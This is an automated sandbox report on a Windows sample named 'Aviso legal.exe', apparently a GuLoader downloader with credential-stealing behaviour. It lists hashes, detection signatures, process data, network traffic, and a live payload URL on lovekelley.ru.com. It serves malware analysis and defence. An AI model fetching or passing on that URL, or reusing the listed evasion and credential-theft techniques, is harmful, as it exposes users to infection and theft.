Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aviso legal.exe

Overview

General Information

Sample name:Aviso legal.exe
Analysis ID:1445943
MD5:c7ae7bfda7f71b76c6f3213cfe94529e
SHA1:eebcb778056a8fa9a33255141d70ffac41523caf
SHA256:93b75e7f99768d86cb26282a3164d806d36a2c890fb7d367f0cf389a75d304d4
Infos:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • Aviso legal.exe (PID: 8552 cmdline: "C:\Users\user\Desktop\Aviso legal.exe" MD5: C7AE7BFDA7F71B76C6F3213CFE94529E)
    • Aviso legal.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\Aviso legal.exe" MD5: C7AE7BFDA7F71B76C6F3213CFE94529E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.6069498581.00000000362C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1406570812.0000000005C09000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Aviso legal.exe PID: 6196JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Aviso legal.exeAvira: detected
        Source: http://lovekelley.ru.com/FroOsE89.binAvira URL Cloud: Label: malware
        Source: Aviso legal.exeReversingLabs: Detection: 18%
        Source: Aviso legal.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49796 version: TLS 1.2
        Source: Aviso legal.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,10_2_00405C49
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00406873 FindFirstFileW,FindClose,10_2_00406873
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0040290B FindFirstFileW,10_2_0040290B
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /FroOsE89.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lovekelley.ru.comCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /FroOsE89.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lovekelley.ru.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: lovekelley.ru.com
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: Aviso legal.exe, 00000000.00000000.954159692.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Aviso legal.exe, 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Aviso legal.exe, 0000000A.00000000.1264288005.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49796 version: TLS 1.2
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0040352D EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,LdrInitializeThunk,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,10_2_0040352D
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040755C0_2_0040755C
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_00406D850_2_00406D85
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_705B1BFF0_2_705B1BFF
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0040755C10_2_0040755C
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00406D8510_2_00406D85
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0016D0B810_2_0016D0B8
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0016A3B810_2_0016A3B8
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0016AFD010_2_0016AFD0
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0016060010_2_00160600
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0016A70010_2_0016A700
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_3611EE0010_2_3611EE00
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_36113EE810_2_36113EE8
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_3611CCC010_2_3611CCC0
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_3930457010_2_39304570
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_393009D010_2_393009D0
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_395D593810_2_395D5938
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_395D40C810_2_395D40C8
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_395DC32010_2_395DC320
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_361149D210_2_361149D2
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: String function: 00402DA6 appears 51 times
        Source: Aviso legal.exeStatic PE information: invalid certificate
        Source: Aviso legal.exe, 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameudsttelsers.exeDVarFileInfo$ vs Aviso legal.exe
        Source: Aviso legal.exe, 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameudsttelsers.exeDVarFileInfo$ vs Aviso legal.exe
        Source: Aviso legal.exe, 0000000A.00000002.6069195801.0000000036069000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Aviso legal.exe
        Source: Aviso legal.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@3/22@2/2
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0040352D EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,LdrInitializeThunk,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,10_2_0040352D
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
        Source: C:\Users\user\Desktop\Aviso legal.exeFile created: C:\Users\user\AppData\Local\Cabdriver.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeMutant created: NULL
        Source: C:\Users\user\Desktop\Aviso legal.exeFile created: C:\Users\user\AppData\Local\Temp\nsqA690.tmpJump to behavior
        Source: Aviso legal.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Aviso legal.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\Aviso legal.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Aviso legal.exeReversingLabs: Detection: 18%
        Source: C:\Users\user\Desktop\Aviso legal.exeFile read: C:\Users\user\Desktop\Aviso legal.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
        Source: Aviso legal.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.1406570812.0000000005C09000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_705B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_705B1BFF
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_705B30C0 push eax; ret 0_2_705B30EE
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00160C6D push edi; retf 10_2_00160C7A
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00160CCB push edi; retf 10_2_00160C7A
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_395DD488 push esp; retf 10_2_395DD489
        Source: C:\Users\user\Desktop\Aviso legal.exeFile created: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
